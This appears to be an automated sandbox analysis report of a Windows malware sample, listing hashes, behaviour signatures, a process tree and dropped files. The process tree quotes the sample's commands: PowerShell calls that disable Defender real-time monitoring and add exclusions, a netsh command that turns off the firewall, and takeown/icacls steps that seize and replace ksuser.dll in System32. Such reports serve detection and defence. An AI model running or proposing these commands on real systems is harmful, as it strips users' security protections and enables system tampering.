Analysis

  • max time kernel
    141s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    05-11-2024 07:32

General

  • Target

    SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe

  • Size

    125KB

  • MD5

    a293e528bd51b9d91da21e8cbfa8e5f5

  • SHA1

    c82ecf0733270f0807cb86bad5e1c0126284fd62

  • SHA256

    4fdf991291c527bf79c6b7a489c80d6843a3a36aea0d4ce7e2f027a9b2fedcd5

  • SHA512

    9223707eff3ac89eef7aed38d761926d4d17fafb1ff302ee35e5940fe30a3a7f478d5d59bb3c4864f4c25f2b34af2e769cea298826fdfe65f0c62009e879c020

  • SSDEEP

    3072:6KnT6V9P0IbarstiLniYqANZcfBuydIvRuX1FH4zUFluD:6m6VunedBuydVFH4zUF

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 14 IoCs
  • Modifies file permissions 1 TTPs 14 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe"
    1⤵
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2324
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1628
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1592
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Windows\SysWOW64\uavh.dll'"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1000
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Windows\SysWOW64\uavh.dll'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1620
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2616
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2668
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2316
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:2632
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c dism /Online /enable-feature /FeatureName:"DirectPlay" /All
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Windows\SysWOW64\Dism.exe
        dism /Online /enable-feature /FeatureName:"DirectPlay" /All
        3⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        PID:2656
    • C:\Windows\SysWOW64\takeown.exe
      takeown /f "C:\Windows\system32\ksuser.dll" /A
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2820
    • C:\Windows\SysWOW64\takeown.exe
      takeown /f "C:\Windows\system32\ksuser.dll"
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2708
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant Administrators:(F,DE)
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2560
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant "Admin":(F,DE)
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2576
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /inheritance:d
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2516
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /setowner "NT SERVICE\TrustedInstaller
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2584
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant:r "NT SERVICE\TrustedInstaller":F
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2044
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant:r "Administrators":RX
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:1932
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant:r "Admin":RX
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:840
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /inheritance:d
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:672
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /setowner "NT SERVICE\TrustedInstaller
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2720
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /grant:r "NT SERVICE\TrustedInstaller":F
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2728
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /grant:r "Administrators":RX
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2260
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /grant:r "Admin":RX
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:1632

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    6617a2f11084bb9893c3ab1b4bd073eb

    SHA1

    0090c4dade877b98a5df88389d7132e420155594

    SHA256

    b6a591da0da6d461559d478e474ea6b4884e97eb4bf5b1db59718c052527ce5d

    SHA512

    c96e5dcce3b8897d7102d86e274d30b4982fd2cb3fdfb0d13a4e8664ac7ebe82dccae37b7996376a3f19f5f6d10cc66957f0258d178526620e459f29dca6490e

  • C:\Windows\SysWOW64\ksuser.dll

    Filesize

    118KB

    MD5

    d5f3ecad923278e96bbbb6796f0bbca5

    SHA1

    9c54ba7de2d02306e3fcfa949163f10086c3ca3b

    SHA256

    447ae50e3e916b31ca861c97e9aab69301cec7ac9f1e527c07048ea7cba81807

    SHA512

    9c27b05c497ba2662b93092d848c02ae3cadc8096618df488371be03859dc701e3d167745507b23a017c4d35b96cf285642af75f13ee749bafa891d25c671e5a

  • memory/1592-4-0x0000000074151000-0x0000000074152000-memory.dmp

    Filesize

    4KB

  • memory/1592-6-0x0000000074150000-0x00000000746FB000-memory.dmp

    Filesize

    5.7MB

  • memory/1592-5-0x0000000074150000-0x00000000746FB000-memory.dmp

    Filesize

    5.7MB

  • memory/1592-7-0x0000000074150000-0x00000000746FB000-memory.dmp

    Filesize

    5.7MB

  • memory/1592-8-0x0000000074150000-0x00000000746FB000-memory.dmp

    Filesize

    5.7MB

  • memory/1592-9-0x0000000074150000-0x00000000746FB000-memory.dmp

    Filesize

    5.7MB

  • memory/2324-0-0x0000000001320000-0x000000000137C000-memory.dmp

    Filesize

    368KB

  • memory/2324-1-0x0000000000030000-0x0000000000033000-memory.dmp

    Filesize

    12KB

  • memory/2324-26-0x0000000001320000-0x000000000137C000-memory.dmp

    Filesize

    368KB